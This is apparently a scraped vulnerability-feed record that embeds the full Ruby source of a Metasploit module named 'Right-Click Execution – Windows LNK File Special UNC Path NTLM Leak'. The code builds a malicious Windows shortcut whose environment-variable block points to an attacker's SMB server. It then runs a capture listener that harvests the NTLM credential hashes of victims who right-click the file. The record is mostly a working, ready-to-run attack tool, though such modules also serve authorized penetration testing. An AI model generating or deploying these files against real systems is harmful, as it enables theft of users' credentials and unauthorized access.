{“lastseen”:”2025-10-01T21:38:33″,”description”:”This module creates a malicious Windows shortcut (LNK) file that specifies a special UNC path in EnvironmentVariableDataBlock of Shell…”,”published”:”2025-10-01T18:56:05″,”modified”:”2025-10-01T18:56:05″,”type”:”metasploit”,”title”:”Right-Click Execution – Windows LNK File Special UNC Path NTLM Leak”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-FILEFORMAT-ENVIRONMENT_VARIABLE_DATABLOCK_LEAK-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘faker’\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::FILEFORMAT\\n include Msf::Exploit::Remote::SMB::Server::Share\\n include Msf::Exploit::Remote::SMB::Server::HashCapture\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Right-Click Execution – Windows LNK File Special UNC Path NTLM Leak’,\\n ‘Description’ =\\u003e %q{\\n This module creates a malicious Windows shortcut (LNK) file that\\n specifies a special UNC path in EnvironmentVariableDataBlock of Shell Link (.LNK)\\n that can trigger an authentication attempt to a remote server. This can be used\\n to harvest NTLM authentication credentials.\\n\\n When a victim right-click the generated LNK file, it will attempt to connect to the\\n the specified UNC path, resulting in an SMB connection that can be captured\\n to harvest credentials.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Nafiez’, # Original POC \\u0026 Module\\n ],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/zeifan.my\/Right-Click-LNK\/’]\\n ],\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Targets’ =\\u003e [\\n [‘Windows’, {}]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-05-06’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],\\n ‘Reliability’ =\\u003e []\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘DESCRIPTION’, [false, ‘The shortcut description’, nil]),\\n OptString.new(‘ICON_PATH’, [false, ‘The icon path to use’, nil]),\\n OptInt.new(‘PADDING_SIZE’, [false, ‘Size of padding in command arguments’, 10]),\\n ])\\n end\\n\\n def run\\n lnk_data = create_lnk_file\\n filename = file_create(lnk_data)\\n print_good(\\”LNK file created: #{filename}\\”)\\n\\n start_smb_capture_server\\n print_status(\\”Listening for hashes on #{srvhost}:#{srvport}\\”)\\n\\n stime = Time.now.to_f\\n timeout = datastore[‘ListenerTimeout’].to_i\\n loop do\\n break if timeout \\u003e 0 \\u0026\\u0026 (stime + timeout \\u003c Time.now.to_f)\\n\\n Rex::ThreadSafe.sleep(1)\\n end\\n end\\n\\n def create_lnk_file\\n data = ”.b\\n\\n # LNK header – 76 bytes\\n header = \\”\\\\x4C\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # LinkCLSID (00021401-0000-0000-C000-000000000046)\\n header += \\”\\\\x01\\\\x14\\\\x02\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xC0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x46\\”.b\\n\\n # Define LinkFlags\\n link_flags = 0x00000000\\n link_flags |= 0x00000004 # HAS_NAME\\n link_flags |= 0x00000020 # HAS_ARGUMENTS\\n link_flags |= 0x00000040 # HAS_ICON_LOCATION\\n link_flags |= 0x00000080 # IS_UNICODE\\n link_flags |= 0x00000200 # HAS_EXP_STRING\\n\\n header += [link_flags].pack(‘V’)\\n\\n # FileAttributes (FILE_ATTRIBUTE_NORMAL)\\n header += \\”\\\\x20\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # CreationTime, AccessTime, WriteTime (zeroed)\\n header += (\\”\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\”.b) * 3\\n\\n # FileSize\\n header += \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # IconIndex\\n header += \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # ShowCommand (SW_SHOWNORMAL)\\n header += \\”\\\\x01\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # HotKey\\n header += \\”\\\\x00\\\\x00\\”.b\\n\\n # Reserved fields\\n header += \\”\\\\x00\\\\x00\\”.b + \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b + \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # Add the header to our binary data\\n data += header\\n\\n # NAME field (description in Unicode)\\n description = datastore[‘DESCRIPTION’] || Faker::Lorem.sentence(word_count: 3)\\n description_utf16 = description.encode(‘UTF-16LE’).b\\n data += [description_utf16.bytesize \/ 2].pack(‘v’)\\n data += description_utf16\\n\\n # ARGUMENTS field (command line arguments in Unicode)\\n padding_size = datastore[‘PADDING_SIZE’]\\n cmd_args = ‘ ‘ * padding_size\\n cmd_args_utf16 = cmd_args.encode(‘UTF-16LE’).b\\n data += [cmd_args_utf16.bytesize \/ 2].pack(‘v’)\\n data += cmd_args_utf16\\n\\n # ICON LOCATION field (icon path in Unicode)\\n icon_path = datastore[‘ICON_PATH’] || ‘e.g. abc.ico’\\n icon_path_utf16 = icon_path.encode(‘UTF-16LE’).b\\n data += [icon_path_utf16.bytesize \/ 2].pack(‘v’)\\n data += icon_path_utf16\\n\\n # ExtraData section – ICON ENVIRONMENT DATABLOCK SIGNATURE\\n env_block_size = 0x00000314 # Total size of this block\\n env_block_sig = 0xA0000001 # Environmental Variables block signature\\n\\n data += [env_block_size].pack(‘V’)\\n data += [env_block_sig].pack(‘V’)\\n\\n # Target field in ANSI (260 bytes)\\n unc_share = datastore[‘SHARE’]\\n unc_share = Rex::Text.rand_text_alphanumeric(6) if unc_share.blank?\\n unc_path = \\”\\\\\\\\\\\\\\\\#{srvhost}\\\\\\\\#{unc_share}\\”\\n\\n # Create fixed-size ANSI buffer with nulls\\n ansi_buffer = \\”\\\\x00\\”.b * 260\\n\\n # Copy the UNC path bytes into the buffer\\n unc_path.bytes.each_with_index do |byte, i|\\n ansi_buffer.setbyte(i, byte) if i \\u003c ansi_buffer.bytesize\\n end\\n\\n data += ansi_buffer\\n\\n # Target field in Unicode (520 bytes)\\n unc_path_utf16 = unc_path.encode(‘UTF-16LE’).b\\n\\n # Create fixed-size Unicode buffer with nulls\\n unicode_buffer = \\”\\\\x00\\”.b * 520\\n\\n # Copy the UTF-16LE encoded UNC path bytes into the buffer\\n unc_path_utf16.bytes.each_with_index do |byte, i|\\n unicode_buffer.setbyte(i, byte) if i \\u003c unicode_buffer.bytesize\\n end\\n\\n data += unicode_buffer\\n\\n data += \\”\\\\x00\\\\x00\\\\x00\\\\x00\\”.b\\n\\n data\\n end\\n\\n def get_unc_path\\n \\”\\\\\\\\\\\\\\\\#{srvhost}\\\\\\\\#{Rex::Text.rand_text_alphanumeric(6)}\\”\\n end\\n\\n def start_smb_capture_server\\n start_service\\n print_status(‘The SMB service has been started.’)\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/fileformat\/environment_variable_datablock_leak.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/fileformat\/environment_variable_datablock_leak\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-01T21:38:33″,”description”:”This module creates a malicious Windows shortcut (LNK) file that specifies a special UNC path in EnvironmentVariableDataBlock of Shell…”,”published”:”2025-10-01T18:56:05″,”modified”:”2025-10-01T18:56:05″,”type”:”metasploit”,”title”:”Right-Click Execution – Windows LNK File Special…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-19827","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n